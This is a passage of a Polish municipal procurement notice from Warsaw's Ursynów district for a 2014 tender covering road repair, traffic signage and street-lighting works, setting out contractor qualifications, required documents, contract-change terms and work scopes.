1  Za wykonaną robotę Zamawiający uzna taką robotę, którą Wykonawca wykonał w ramach jednej umowy i której przedmiot został odebrany przez Zamawiającego jako wykonany zgodnie z zasadami sztuki budowlanej i prawidłowo ukończony.
2 Pod pojęciem wykonania oznakowania poziomego należy rozumieć wykonanie nowego oznakowania poziomego.

3. DOTYCZY CZĘŚCI III ZAMÓWIENIA:
Wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert w postępowaniu (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) wykonał1 (tj. zakończył) co najmniej jedną robotę budowlaną polegającą min. na wykonaniu2, modernizacji3 lub przebudowie4 oświetlenia ulicznego.

UWAGA!
1  Za wykonaną robotę Zamawiający uzna taką robotę, którą Wykonawca wykonał w ramach jednej umowy i której przedmiot został odebrany przez Zamawiającego jako wykonany zgodnie z zasadami sztuki budowlanej i prawidłowo ukończony.
2 Pod pojęciem wykonania oświetlenia ulicznego należy rozumieć wykonanie nowego oświetlenia ulicznego;
3 Pod pojęciem modernizacji oświetlenia ulicznego należy rozumieć wykonanie robót polegających na odtworzeniu stanu pierwotnego oświetlenia ulicznego;
4 Pod pojęciem przebudowy oświetlenia ulicznego należy rozumieć zmianę już istniejącego oświetlenia ulicznego, nie powodującej jednak powstania nowej jego części.

Ocena spełniania warunku udziału w postępowaniu dokonana zostanie w systemie 1 lub 0, zgodnie z formułą spełnia-nie spełnia w oparciu o informacje zawarte w oświadczeniu i dokumentach wyszczególnionych w pkt pkt III.4.1) Ogłoszenia. Z treści załączonego oświadczenia i dokumentów musi wynikać jednoznacznie, iż w/w warunek Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.  DOTYCZY CZĘŚCI I ZAMÓWIENIA:
Wykonawca dysponuje co najmniej jedną osobą wyznaczoną do sprawowania funkcji kierownika robót, posiadającą uprawnienia budowlane bez ograniczeń w specjalności drogowej lub odpowiednie wydane na podstawie wcześniej obowiązujących przepisów lub odpowiednie wydane obywatelom innych Państw, z zastrzeżeniem art.12a. ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity - Dz.U. z 2013 r., poz.1409 z późn.zm.) 

ORAZ 

2.  DOTYCZY CZĘŚCI II ZAMÓWIENIA:
Wykonawca dysponuje co najmniej jedną osobą wyznaczoną do sprawowania funkcji kierownika robót, posiadającą uprawnienia budowlane bez ograniczeń w specjalności drogowej lub odpowiednie wydane na podstawie wcześniej obowiązujących przepisów lub odpowiednie wydane obywatelom innych Państw, z zastrzeżeniem art.12a. ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity - Dz.U. z 2013 r., poz.1409 z późn.zm.)

ORAZ 

3.  DOTYCZY CZĘŚCI III ZAMÓWIENIA:
Wykonawca dysponuje co najmniej jedną osobą wyznaczoną do sprawowania funkcji kierownika robót elektrycznych, posiadającą uprawnienia budowlane bez ograniczeń w specjalności instalacyjnej w zakresie sieci i instalacji elektrycznych lub odpowiednie wydane na podstawie wcześniej obowiązujących przepisów lub odpowiednie wydane obywatelom innych Państw, z zastrzeżeniem art.12a. ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity - Dz.U. z 2013 r., poz.1409 z późn.zm.).

UWAGA!
W przypadku, gdy Wykonawca będzie składał ofertę na więcej niż na jedną Część w odniesieniu do pkt III.3.4)1. Ogłoszenia (dotyczy Części I zamówienia) oraz w odniesieniu do pkt III.3.4)2. Ogłoszenia (dotyczy Części II zamówienia), za wystarczające uzna się jednokrotne wykazanie osobą, o której mowa w ww. punktach, tj. jeżeli Wykonawca składa ofertę na Część I i II zamówienia to wykazując, iż dysponuje co najmniej jedną osobą wyznaczoną do sprawowania funkcji kierownika robót, posiadającą uprawnienia budowlane bez ograniczeń w specjalności drogowej lub odpowiednie wydane na podstawie wcześniej obowiązujących przepisów lub odpowiednie wydane obywatelom innych Państw, z zastrzeżeniem art.12a. ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity - Dz.U. z 2013 r., poz.1409 z późn.zm.) - spełni warunek opisany w pkt III.3.4)1. Ogłoszenia (dotyczy Części I zamówienia) i III.3.4)2. Ogłoszenia (dotyczy Części II zamówienia).

Ocena spełniania warunku udziału w postępowaniu dokonana zostanie w systemie 1 lub 0, zgodnie z formułą spełnia-nie spełnia w oparciu o informacje zawarte w oświadczeniu wyszczególnionym w pkt III.4.1) Ogłoszenia. Z treści załączonych oświadczeń i dokumentów musi wynikać jednoznacznie, iż w/w warunek Wykonawca spełnił.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>III.6.1) Dowodami o których mowa w pkt  III.4.1) Ogłoszenia są:
a) poświadczenie;
b) inne dokumenty - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w pkt a). 
Ww. dokumenty muszą zawierać przyczyny braku możliwości uzyskania poświadczenia.

W przypadku, gdy Zamawiający jest podmiotem, na rzecz którego roboty budowlane wskazane w wykazie zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów.

III.6.2)  W przypadku gdy Wykonawca będzie w zakresie wykonania Części 1i/lub Części 2 i/lub Części  3 polegał na wiedzy i doświadczeniu, osobach zdolnych do wykonania zamówienia - innego/ych podmiotu/ów, niezależnie od charakteru prawnego łączących go z nim/i stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tego/tych podmiotu/ów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
Dokument ten powinien w szczególności zawierać następujące informacje:
a) zakres dostępnych wykonawcy zasobów innego podmiotu (tj. jaki rodzaj zasobu jest udostępniany);
b) sposób wykorzystania zasobów innego podmiotu praz Wykonawcę przy wykonywaniu zamówienia (np. doradztwo, podwykonawstwo, itp.);
c) charakter stosunku jaki będzie łączył Wykonawcę z innym podmiotem;
d) zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia.

III.6.3) W celu potwierdzenia spełniania warunku udziału w postępowaniu opisanego w pkt III.3.4.)1. Ogłoszenia (dotyczy Części I) oraz/albo w pkt III.3.4)2. Ogłoszenia (dotyczy Części II) oraz/albo w pkt III.3.4)3. Ogłoszenia (dotyczy Części III) Zamawiający nie wymaga od Wykonawcy dołączenia do oferty wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za kierowanie robotami.

III.6.4) INFORMACJA UZUPEŁNIAJACA: Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. III.4.3.1, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem. Dokument powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W odniesieniu do art.144 ust.1 ustawy Prawo zamówień publicznych - Zamawiający zastrzega sobie możliwość zmiany warunków umowy na etapie jej realizacji w zakresie określonym w §15 wzoru umowy stanowiącego załącznik nr 6a) do SIWZ- dotyczy Części I oraz stanowiącego załącznik nr 6b) do SIWZ- dotyczy Części II oraz stanowiącego załącznik nr 6c) do SIWZ- dotyczy Części III oraz w zakresie:
1.Maksymalnej ilości danych robót w zakresie danej Części zamówienia, z zastrzeżeniem iż nie może zostać przekroczona: maksymalna cena ofertowa brutto w zakresie danej Części zamówienia.
2.Zmiany w spisie dróg gminnych i wewnętrznych wprowadzonych np. uchwałą Rady m.st. Warszawy;
3.Zmniejszenia wynagrodzenia w zakresie danej Części z tego powodu, że wykonanie części zamówienia nie leży w interesie publicznym, czego nie można było przewidzieć w dniu zawarcia umowy lub z powodu rezygnacji z wykonania części zamówienia.
4.Zmiany kadry, tj. osób odpowiedzialnych odpowiednio za: nadzór zamówienia ze strony Wykonawcy,  nadzór ze strony Zamawiającego, w szczególności z powodu zdarzeń losowych, tj. śmierć, choroba, ustanie stosunku pracy, przy czym w odniesieniu do osób ze strony Wykonawcy, mają być to osoby posiadające co najmniej kwalifikacje, o których mowa odpowiednio w pkt  III.3.4 ) 1. Ogłoszenia (w zakresie Części 1), w pkt  III.3.4 ) 2. Ogłoszenia (w zakresie Części 2) w pkt  III.3.4 ) 3. Ogłoszenia (w zakresie Części 3).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ursynow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> - osobiście w Urzędzie m. st. Warszawy Dzielnicy Ursynów, 02-777 Warszawa, Al. KEN 61 pok. nr 333.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.03.2014 godzina 12:30, miejsce: SIEDZIBA ZAMAWIAJACEGO PRZY AL. KEN 61, WYDZIAŁ INFRASTRUKTURY, POK. NR 407.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Utrzymanie, remont, konserwację i naprawę wraz z oznakowaniem i oświetlenia dróg gminnych oraz dróg będących we władaniu m. st. Warszawy znajdujących się na terenie Dzielnicy Ursynów.
Część 1. Utrzymanie, remont, konserwacja, naprawa dróg gminnych oraz drogach będących we władaniu m. st. Warszawy znajdujących się na terenie Dzielnicy Ursynów..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Utrzymanie, remont, konserwacja, naprawa dróg gminnych oraz dróg będących we władaniu m. st. Warszawy znajdujących się na terenie Dzielnicy Ursynów.

I. Zakres prac objętych zamówieniem obejmuje: 
1. Naprawy - roboty związane z usuwaniem awarii, a w szczególności likwidacją uszkodzeń nawierzchni drogowych zagrażających bezpieczeństwu ruchu kołowego lub pieszego.
2. Utrzymanie - roboty związane z bieżącym wykonywaniem prac zmierzających do zwiększenia bezpieczeństwa i wygody ruchu.
3. Konserwacja - roboty związane z wykonywaniem napraw bieżących nawierzchni jezdni i chodników bez zmiany konstrukcji nawierzchni.
4. Remonty - roboty związane z wykonywaniem prac przywracających pierwotny stan drogi, także przy użyciu wyrobów budowlanych innych niż użyte w stanie pierwotnym.

II. Zakres rzeczowy robót objętych przedmiotem zamówienia.
1. Konserwacja i remonty cząstkowe ulic na terenie Dzielnicy Ursynów na całej szerokości   pasa drogowego, a w szczególności wykonywanie robót w następujących zakresach:
1.1.  Roboty ziemne:
- roboty ziemne mechaniczne z odwiezieniem urobku.
1.2.  Warstwy odsączające i podsypkowe i podbudowy:
- warstwy podsypkowe cementowo - piaskowe,
- podbudowy betonowe,
- podbudowy z tłucznia kamiennego sortowanego
1.3.  Nawierzchnie dróg nieulepszone:
- nawierzchnie gruntowe,
- nawierzchnie żwirowe i z kruszywa kamiennego,
- nawierzchnie tłuczniowe kamiennego,
-nawierzchnie brukowe,
- nawierzchnie z płyt żelbetowych (MON),
- nawierzchnie z płyt drogowych wielootworowych,
- nawierzchnie z płyt drogowych o grubości 15 cm.
1.4.  Nawierzchnie ulepszone:
- nawierzchnie z  mieszanek mineralno-bitumicznych grysowych,
- nawierzchnie z  mieszanek mastyksowo- grysowej (SMA), 
- nawierzchnie z kostki brukowej,
- ułożenie geowłókniny,  sitaki wzmacniającej.
1.5.  Krawężniki i obrzeża:
- krawężniki  kamienne  na podsypce cementowo - piaskowej na ławach z oporem
- krawężniki  betonowe  na podsypce cementowo - piaskowej na ławach z oporem ,
- obrzeża betonowe 30x8 cm na podsypce piaskowej.
1.6. Chodniki
- chodniki z kostki brukowej  betonowej grubości  8cm i 6 cm na podsypce  piaskowej i cementowo-piaskowej.
- chodniki z płyt betonowych 50x50x7 cm na podsypce piaskowej.
1.7.  Roboty rozbiórkowe
- rozebranie i frezowanie  nawierzchni z mas mineralno - bitumicznych z odwiezieniem gruzu: 
- rozebranie nawierzchni z płyt żelbetowych MON,
- nawierzchni  z płyt drogowych wielootworowych,
- rozebranie chodników z płyt betonowych i rozebranie nawierzchni  z kostki brukowej 
  z odwiezieniem gruzu,
- rozebranie krawężników betonowych,
- rozebranie obrzeży trawnikowych.
1.8. Remonty cząstkowe jezdni o nawierzchniach bitumicznych z odwiezieniem gruzu:
- zabezpieczenie uszkodzonej nawierzchni,
- remonty cząstkowe nawierzchni bitumicznych  mieszanką mineralno - asfaltową.
1.9.  Roboty naprawczo - konserwacyjne:
- naprawy dróg gruntowych - profilowanie z  zagęszczeniem,
- ścinanie poboczy z odwiezieniem ziemi.
1.10. Urządzenia odwodnieniowe:
- ułożenie rur drenarskich fi 100 mm i fi 300 mm,
- odtworzenie rowów odparowalnych,
- oczyszczenie studni chłonnych,
- regulacja  pionowa  zaworów wodociągowych, gazowych, włazów kanałowych, kratek  ściekowych ulicznych oraz studni teletechnicznych.
1.11. Odtworzenie trawników
-  przekopanie gleby
- rozrzucenie ziemi żyznej lub kompostowej 
- wykonanie trawników dywanowych siewem.
1.12. Opracowanie czasowej organizacji ruchu związanej z remontem  kapitalnym nawierzchni dróg. 

III. Sposób realizacji przedmiotu zamówienia w zakresie utrzymania, remontu, konserwacji, naprawy dróg gminnych oraz dróg będących. 
1.1. Do robót Wykonawca będzie przystępował po sporządzeniu i przekazaniu przez Zamawiającego protokółu wprowadzenia.
- W protokóle będzie określony zakres robót i termin wykonania. Po sporządzeniu  protokółu wprowadzenia Wykonawca zobowiązany jest wykonać dokumentację zdjęciową danego obiektu.
- Teren robót należy zabezpieczyć i oznakować, zgodnie z obowiązującymi przepisami.
- Roboty należy prowadzić w sposób, który nie powoduje znacznych utrudnień w ruchu. 
- Wykonawca dokumentuje wykonanie poszczególnego etapu robót budowlanych poprzez  wykonanie  zdjęć.
- Zamawiający przystąpi do odbioru prac nie później niż w ciągu 7 dni od daty zgłoszenia odbioru.
1.2.  Rozliczenie prac zgłoszonych do odbioru nastąpi na podstawie:
- bezusterkowego protokołu odbioru,
- zaakceptowanych przez zamawiającego obmiarów i kosztorysów powykonawczych wraz ze szkicem sytuacyjnym.
1.3. Odbiór trawników po pierwszym koszeniu.

Przy powstawaniu nowych zrealizowanych inwestycji drogowych Wykonawca wykonuje dokumentację powykonawczą z naniesieniem na mapę zasadniczą miasta.

Szczegółowy opis przedmiotu zamówienia dla Części 1 określa również treść załącznika nr 1 do wzoru umowy oraz:
a)wzór umowy stanowiący załącznik nr 6a) do SIWZ
b)przedmiar robót - załącznik nr 7a) do SIWZ;
c)specyfikacja techniczna wykonania i odbioru robót - załącznik nr 8a) do SIWZ stanowiący równocześnie załącznik nr 2 do wzoru umowy. 
d)wykaz dróg gminnych stanowiący załącznik nr 9 do SIWZ oraz stanowiący równocześnie załącznik nr 4 do wzoru umowy, 
e)wykaz dróg wewnętrznych stanowiący załącznik nr 10 do SIWZ oraz stanowiący równocześnie załącznik nr 5 do wzoru umowy

Termin wykonania zamówienia ustala się od dnia zawarcia umowy do dnia 10.12.2014 r. lub do wyczerpania maksymalnego wynagrodzenia, o którym mowa w § 8 ust. 1 wzoru umowy (stanowiącego  załącznik nr 6a) do SIWZ dla Części 1 w zależności od tego które z tych zdarzeń nastąpi jako pierwsze..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 71.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Utrzymanie, remont, konserwację i naprawę wraz z oznakowaniem i oświetlenia dróg gminnych oraz dróg będących we władaniu m. st. Warszawy znajdujących się na terenie Dzielnicy Ursynów.
Część 2. Oznakowanie pionowe i poziome oraz urządzenia bezpieczeństwa ruchu drogowego w ramach utrzymania i wdrażanie projektów organizacji ruchu w drogach gminnych oraz drogach będących we władaniu m. st. Warszawy znajdujących się na terenie Dzielnicy Ursynów..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest oznakowanie pionowe i poziome oraz urządzenia bezpieczeństwa ruchu w ramach bieżącego utrzymania i wdrażanie projektów organizacji ruchu na drogach gminnych i drogach wewnętrznych będących we władaniu m. st. Warszawy znajdujących się na terenie Dzielnicy Ursynów.

I. Zakres prac objętych zamówieniem obejmuje: 
1.  Poprawa oznakowania pionowego i poziomego oraz urządzeń bezpieczeństwa ruchu 
2. Wdrażanie projektów organizacji ruchu 

II. Zakres rzeczowy robót objętych przedmiotem zamówienia.
1. Poprawa oznakowania pionowego i poziomego oraz urządzeń bezpieczeństwa ruchu na terenie Dzielnicy Ursynów na całej szerokości pasa drogowego, a w szczególności wykonywanie robót w następujących zakresach:
Oznakowanie pionowe i poziome oraz urządzenia bezpieczeństwa ruchu drogowego
- odnawianie oznakowania poziomego jezdni farbą chlorokauczukową i chlorokauczukową z  dodatkami mikrokulek szklanych
- wymiana oznakowania pionowego zniszczonych znaków drogowych, słupków do znaków drogowych luster okrągłych i prostokątnych oraz słupków wygrodzeniowych, łańcuchów  i  pylonów oraz zapór
- prostowanie sztyc do znaków drogowych i słupków wygrodzeniowych
- naprawa i wykonywanie urządzeń bezpieczeństwa ruchu drogowego
2. Wdrażanie projektów organizacji ruchu na terenie Dzielnicy Ursynów na całej szerokości pasa drogowego zgodnie z zatwierdzonymi projektami oraz ze szczegółowymi warunkami technicznymi dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunkami ich umieszczania na drogach określonymi w załącznikach 1-4 do rozporządzenia Ministra Infrastruktury z dnia 3 lipca 2003r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach

III. Sposób realizacji przedmiotu zamówienia w zakresie poprawy oznakowania pionowego i poziomego oraz urządzeń bezpieczeństwa ruchu oraz wdrażania projektów organizacji ruchu              
1. Do robót Wykonawca będzie przystępował po sporządzeniu i przekazaniu przez Zamawiającego protokółu wprowadzenia.
- W protokóle będzie określony zakres robót i termin wykonania.
- Teren robót należy zabezpieczyć i oznakować, zgodnie z obowiązującymi przepisami.
- Roboty należy prowadzić w sposób, który nie powoduje znacznych utrudnień w ruchu.
- Zamawiający przystąpi do odbioru prac nie później niż w ciągu 7 dni od daty zgłoszenia odbioru.
2.  Rozliczenie prac zgłoszonych do odbioru nastąpi na podstawie:
- bezusterkowego protokołu odbioru,
- zaakceptowanych przez zamawiającego obmiarów i kosztorysów powykonawczych.

Szczegółowy opis przedmiotu zamówienia dla Części 2 określa również treść załącznika nr 1 do wzoru umowy oraz:
a)wzór umowy stanowiący załącznik nr 6b) do SIWZ
b)przeddiar robót - załącznik nr 7b) do SIWZ
c)specyfikacja techniczna wykonania i odbioru robót - załącznik nr 8b) do SIWZ stanowiący równocześnie załącznik nr 2 do wzoru umowy. 
d)wykaz dróg gminnych stanowiący załącznik nr 9 do SIWZ oraz stanowiący równocześnie załącznik nr 4 do wzoru umowy
e)wykaz dróg wewnętrznych stanowiący załącznik nr 10 do SIWZ oraz stanowiący równocześnie załącznik nr 5 do wzoru umowy

Termin wykonania zamówienia ustala się od dnia zawarcia umowy do dnia 10.12.2014 r. lub do wyczerpania maksymalnego wynagrodzenia, o którym mowa w § 8 ust. 1 wzoru umowy (stanowiącego załącznik nr 6b) do SIWZ dla Części  2 w zależności od tego które z tych zdarzeń nastąpi jako pierwsze.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.31.50-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Utrzymanie, remont, konserwacja i naprawa wraz z oznakowaniem i oświetlenia dróg gminnych oraz dróg będących we władaniu m. st. Warszawy znajdujących się na terenie Dzielnicy Ursynów.
Część 3. Utrzymanie, remont, konserwacja i naprawa oświetlenia dróg gminnych oraz dróg będących we władaniu m. st. Warszawy znajdujących się na terenie Dzielnicy Ursynów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Utrzymanie, budowa, remont, konserwacja i naprawa oświetlenia dróg gminnych oraz dróg będących we władaniu m. st. Warszawy znajdujących się na terenie Dzielnicy Ursynów

I. Zakres prac objętych zamówieniem obejmuje:
1.Naprawy - roboty związane z usuwaniem awarii, a w szczególności likwidacją uszkodzeń
2.Utrzymanie i konserwacja - roboty związane z wykonywaniem napraw bieżących
3.Remonty - roboty związane z wykonywaniem prac przywracających pierwotny stan, także przy użyciu wyrobów budowlanych innych niż użyte w stanie pierwotnym.
4.Budowę - oświetlenia ulic związanych z zgłoszeniami radnych i mieszkańców o niedoświetlonych miejscach

II. Zakres rzeczowy robót objętych przedmiotem zamówienia.
Budowa, modernizacja, konserwacja i remonty oświetlenia ulic na terenie Dzielnicy Ursynów a w szczególności wykonywanie robót w następujących zakresach:
1.Roboty ziemne :
-kopanie rowu kablowego
-kopanie dołków pod fundamenty prefabrykowane
-wykonanie przepustu pod jezdnią
-wykonanie przepustów przy drzewach
-nasypanie warstwy piasku
-zasypanie rowu kablowego
2.Roboty demontażowe :
-demontaż słupów oświetleniowych
-demontaż opraw oświetleniowych
-demontaż urządzenia rozdzielczego szafy oświetleniowej
-demontaż linii zasilającej
3.Roboty montażowe :
-montaż w rowie kablowym rur ochronnych dla kabla oświetleniowego
-montaż w dołach fundamentów prefabrykowanych
-montaż na fundamentach słupów oświetleniowych
-montaż słupów ŻN
-montaż słupów wirowanych
-montaż konstrukcji i osprzętu linii napowietrznej
-montaż przewodów AsXSn linii napowietrznej
-wciągnięcie w rury ochronne i fundamenty kabla oświetleniowego
-montaż na słupach wysięgników
-montaż na słupach opraw oświetleniowych
-montaż na słupach naświetlaczy metalohlogenkowych
-montaż we wnękach słupowych tabliczek bezpiecznikowo-zaciskowych
-montaż w słupach przewodu do zasilenia opraw oświetleniowych
-montaż uziomów
-montaż muf kablowych
-montaż urządzenia rozdzielczego SOK-4
4. Prace kontrolno-pomiarowe
-pomiar oporności kabla
-pomiary skuteczności ochrony przeciwporażeniowej
-pomiar natężenia oświetlenia
5.Prace projektowe
-opracowanie projektów na budowę lub modernizację oświetlenia

III. Sposób realizacji przedmiotu zamówienia w zakresie utrzymania, remontu, budowy, konserwacji, naprawy wraz z modernizacją oświetlenia.
1.1.Do robót Wykonawca będzie przystępował po sporządzeniu i przekazaniu przez
Zamawiającego protokółu wprowadzenia.
-W protokóle będzie określony zakres robót i termin wykonania. Po sporządzeniu protokółu wprowadzenia Wykonawca zobowiązany jest wykonać dokumentację zdjęciową danego obiektu.
-Teren robót należy zabezpieczyć i oznakować, zgodnie z obowiązującymi przepisami.
-Roboty należy prowadzić w sposób, który nie powoduje znacznych utrudnień w ruchu.
-Zamawiający przystąpi do odbioru prac nie później niż w ciągu 7 dni od daty zgłoszenia odbioru.

1.2.Prowadzenie prac w sąsiedztwie drzew:
Zaleca się kopanie rowu kablowego metodą odkrywkową , podkopu i zastosowanie rur ochronnych dla kabli giętkich by można je było przepleść pomiędzy korzeniami. W miejscach zbliżeń robót ziemnych z drzewami kable układać na głębokości minimum 1,2 metodą przecisku sterowanego , by nie uszkodzić systemu korzeniowego drzewa. Roboty ziemne ( kopanie rowu kablowego , kopanie dołów pod fundamenty słupów ) w okolicy drzew należy bezwzględnie wykonywać ręcznie. Drzewa rosnące w pasie frontu robót należy zabezpieczyć przed mechanicznymi uszkodzeniami, ze szczególnym uwzględnieniem ich systemów korzeniowych. Prace te powinny być wykonane przez specjalistyczną firmę ogrodniczą. W zasięgu koron drzew roboty ziemne należy wykonywać ręcznie, przy minimalnej ingerencji i ich systemy korzeniowe. Prace związane z montażem słupów oświetleniowych i opraw oświetleniowych wykonywane w pobliżu koron drzew należy wykonywać bez uszkadzania gałęzi i konarów. Wykonanie ewentualnych cięć technicznych koron należy zlecić specjalistycznej firmie ogrodniczej, zapewniając jednocześnie fachowy nadzór. Cięcia te powinny zostać ograniczone do niezbędnego minimum tak, aby zachować dotychczasowy pokrój koron drzew i powinny być uzgodnione z jednostką opiekującą się drzewami z ramienia zarządcy ulicy. Zabrania się jeżdżenia ciężkim sprzętem w zasięgu koron drzew oraz ich niszczenia. Po zakończeniu robót teren należy uporządkować i przywrócić do stanu pierwotnego. Wszelkie prace, w tym renowacje trawników, powinny być uzgodnione z administratorem terenu. Wszystkie roboty ziemne wykonywać pod nadzorem przedstawiciela Wydziału Ochrony Środowiska Urzędu Dzielnicy Ursynów. Koszt nadzorów i usług ogrodniczych ponosi Wykonawca.

1.3.Stosowane materiały :
